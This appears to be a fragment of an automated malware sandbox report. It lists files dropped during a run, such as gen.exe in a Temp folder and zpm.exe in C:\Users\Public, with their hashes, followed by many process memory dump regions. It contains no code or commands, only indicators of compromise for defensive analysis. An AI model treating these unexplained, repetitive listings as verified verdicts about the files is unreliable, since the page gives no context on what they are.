3be8f8bd211fd2b2caaa25edad1422d0737763cc6377e3e0c73cf5d953e7880b

SHA512
411173b144144b21ac7cc21c65d0ac03bab15e95c89e857a1e25f699f88a88c8479f46b8f4e99b470dba98272f891c621ac8cd3c73c38d53bcff11e21a26bd54

Download Submit
C:\Users\Admin\AppData\Local\Temp\gen.exe

Filesize
24KB

MD5
76ea003513a4fcde2517a83f607f1624

SHA1
a1ffde782b420741de47e4b744d6eb40dd562e69

SHA256
3be8f8bd211fd2b2caaa25edad1422d0737763cc6377e3e0c73cf5d953e7880b

SHA512
411173b144144b21ac7cc21c65d0ac03bab15e95c89e857a1e25f699f88a88c8479f46b8f4e99b470dba98272f891c621ac8cd3c73c38d53bcff11e21a26bd54

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
144709b086b2893c8f73f366f62b804a

SHA1
7ba7b05d80a418f0da7faf2de5c38a9823568805

SHA256
5be427dbd6b77f8e8e603806d7aac0377df818a95d55bc43bd2830c877ae2e08

SHA512
4c64c98ba1f45005690d638c06b626f85b9b9ecd3202c61a65afecfc84304ea362482a92a293b985da96a166b419fe622c8ed36da30cc477bfbb8c4746802981

Download Submit
C:\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
\Users\Admin\AppData\Local\Temp\gen.exe

Filesize
24KB

MD5
76ea003513a4fcde2517a83f607f1624

SHA1
a1ffde782b420741de47e4b744d6eb40dd562e69

SHA256
3be8f8bd211fd2b2caaa25edad1422d0737763cc6377e3e0c73cf5d953e7880b

SHA512
411173b144144b21ac7cc21c65d0ac03bab15e95c89e857a1e25f699f88a88c8479f46b8f4e99b470dba98272f891c621ac8cd3c73c38d53bcff11e21a26bd54

Download Submit
\Users\Admin\AppData\Local\Temp\gen.exe

Filesize
24KB

MD5
76ea003513a4fcde2517a83f607f1624

SHA1
a1ffde782b420741de47e4b744d6eb40dd562e69

SHA256
3be8f8bd211fd2b2caaa25edad1422d0737763cc6377e3e0c73cf5d953e7880b

SHA512
411173b144144b21ac7cc21c65d0ac03bab15e95c89e857a1e25f699f88a88c8479f46b8f4e99b470dba98272f891c621ac8cd3c73c38d53bcff11e21a26bd54

Download Submit
\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
\Users\Public\zpm.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
memory/108-143-0x0000000074290000-0x0000000074315000-memory.dmp

Filesize
532KB

Download
memory/108-156-0x0000000070620000-0x00000000707BE000-memory.dmp

Filesize
1.6MB

Download
memory/108-128-0x0000000074320000-0x000000007436B000-memory.dmp

Filesize
300KB

Download
memory/108-117-0x0000000070860000-0x00000000710DA000-memory.dmp

Filesize
8.5MB

Download
memory/108-131-0x0000000074FF0000-0x0000000075015000-memory.dmp

Filesize
148KB

Download
memory/108-123-0x0000000072CE0000-0x0000000072F15000-memory.dmp

Filesize
2.2MB

Download
memory/108-110-0x0000000074370000-0x00000000743F1000-memory.dmp

Filesize
516KB

Download
memory/108-105-0x00000000713D0000-0x0000000071B6C000-memory.dmp

Filesize
7.6MB

Download
memory/108-101-0x0000000071B70000-0x0000000072668000-memory.dmp

Filesize
11.0MB

Download
memory/108-95-0x0000000072670000-0x0000000072C1B000-memory.dmp

Filesize
5.7MB

Download
memory/108-147-0x00000000707C0000-0x000000007085C000-memory.dmp

Filesize
624KB

Download
memory/316-151-0x0000000070550000-0x0000000070613000-memory.dmp

Filesize
780KB

Download
memory/316-139-0x0000000074290000-0x0000000074315000-memory.dmp

Filesize
532KB

Download
memory/316-99-0x0000000071B70000-0x0000000072668000-memory.dmp

Filesize
11.0MB

Download
memory/316-120-0x0000000070860000-0x00000000710DA000-memory.dmp

Filesize
8.5MB

Download
memory/316-149-0x0000000070620000-0x00000000707BE000-memory.dmp

Filesize
1.6MB

Download
memory/316-144-0x00000000707C0000-0x000000007085C000-memory.dmp

Filesize
624KB

Download
memory/316-124-0x0000000072CE0000-0x0000000072F15000-memory.dmp

Filesize
2.2MB

Download
memory/316-153-0x0000000072CB0000-0x0000000072CDD000-memory.dmp

Filesize
180KB

Download
memory/316-115-0x0000000074370000-0x00000000743F1000-memory.dmp

Filesize
516KB

Download
memory/316-106-0x00000000713D0000-0x0000000071B6C000-memory.dmp

Filesize
7.6MB

Download
memory/316-129-0x0000000074320000-0x000000007436B000-memory.dmp

Filesize
300KB

Download
memory/316-136-0x0000000074FF0000-0x0000000075015000-memory.dmp

Filesize
148KB

Download
memory/768-142-0x0000000074290000-0x0000000074315000-memory.dmp

Filesize
532KB

Download
memory/768-132-0x0000000074320000-0x000000007436B000-memory.dmp

Filesize
300KB

Download
memory/768-112-0x0000000074370000-0x00000000743F1000-memory.dmp

Filesize
516KB

Download
memory/768-135-0x0000000074FF0000-0x0000000075015000-memory.dmp

Filesize
148KB

Download
memory/768-108-0x00000000713D0000-0x0000000071B6C000-memory.dmp

Filesize
7.6MB

Download
memory/768-97-0x0000000072670000-0x0000000072C1B000-memory.dmp

Filesize
5.7MB

Download
memory/768-119-0x0000000070860000-0x00000000710DA000-memory.dmp

Filesize
8.5MB

Download
memory/768-100-0x0000000071B70000-0x0000000072668000-memory.dmp

Filesize
11.0MB

Download
memory/768-146-0x00000000707C0000-0x000000007085C000-memory.dmp

Filesize
624KB

Download
memory/768-121-0x0000000072CE0000-0x0000000072F15000-memory.dmp

Filesize
2.2MB

Download
memory/956-154-0x0000000070550000-0x0000000070613000-memory.dmp

Filesize
780KB

Download
memory/956-107-0x00000000713D0000-0x0000000071B6C000-memory.dmp

Filesize
7.6MB

Download
memory/956-126-0x0000000074320000-0x000000007436B000-memory.dmp

Filesize
300KB

Download
memory/956-155-0x0000000072CB0000-0x0000000072CDD000-memory.dmp

Filesize
180KB

Download
memory/956-122-0x0000000072CE0000-0x0000000072F15000-memory.dmp

Filesize
2.2MB

Download
memory/956-98-0x0000000072670000-0x0000000072C1B000-memory.dmp

Filesize
5.7MB

Download
memory/956-133-0x0000000074FF0000-0x0000000075015000-memory.dmp

Filesize
148KB

Download
memory/956-114-0x0000000074370000-0x00000000743F1000-memory.dmp

Filesize
516KB

Download
memory/956-141-0x0000000074290000-0x0000000074315000-memory.dmp

Filesize
532KB

Download
memory/1004-152-0x0000000072CB0000-0x0000000072CDD000-memory.dmp

Filesize
180KB

Download
memory/1004-103-0x0000000071B70000-0x0000000072668000-memory.dmp

Filesize
11.0MB

Download
memory/1004-109-0x00000000713D0000-0x0000000071B6C000-memory.dmp

Filesize
7.6MB

Download
memory/1004-127-0x0000000074320000-0x000000007436B000-memory.dmp

Filesize
300KB

Download
memory/1004-138-0x0000000074290000-0x0000000074315000-memory.dmp

Filesize
532KB

Download
memory/1004-96-0x0000000072670000-0x0000000072C1B000-memory.dmp

Filesize
5.7MB

Download
memory/1004-150-0x0000000070550000-0x0000000070613000-memory.dmp

Filesize
780KB

Download
memory/1004-134-0x0000000074FF0000-0x0000000075015000-memory.dmp

Filesize
148KB

Download
memory/1004-118-0x0000000070860000-0x00000000710DA000-memory.dmp

Filesize
8.5MB

Download
memory/1004-145-0x00000000707C0000-0x000000007085C000-memory.dmp

Filesize
624KB

Download
memory/1004-113-0x0000000074370000-0x00000000743F1000-memory.dmp

Filesize
516KB

Download
memory/1772-63-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1940-54-0x0000000075F21000-0x0000000075F23000-memory.dmp

Filesize
8KB

Download
memory/1964-125-0x0000000072CE0000-0x0000000072F15000-memory.dmp

Filesize
2.2MB

Download
memory/1964-111-0x0000000074370000-0x00000000743F1000-memory.dmp

Filesize
516KB

Download
memory/1964-130-0x0000000074320000-0x000000007436B000-memory.dmp

Filesize
300KB

Download
memory/1964-94-0x0000000072670000-0x0000000072C1B000-memory.dmp

Filesize
5.7MB

Download
memory/1964-148-0x00000000707C0000-0x000000007085C000-memory.dmp

Filesize
624KB

Download
memory/1964-102-0x0000000071B70000-0x0000000072668000-memory.dmp

Filesize
11.0MB

Download
memory/1964-104-0x00000000713D0000-0x0000000071B6C000-memory.dmp

Filesize
7.6MB

Download
memory/1964-116-0x0000000070860000-0x00000000710DA000-memory.dmp

Filesize
8.5MB

Download
memory/1964-137-0x0000000074FF0000-0x0000000075015000-memory.dmp

Filesize
148KB

Download
memory/1964-140-0x0000000074290000-0x0000000074315000-memory.dmp

Filesize
532KB

Download
memory/2180-307-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2180-314-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2180-320-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2180-292-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2180-295-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2180-300-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2180-305-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2180-312-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2460-370-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download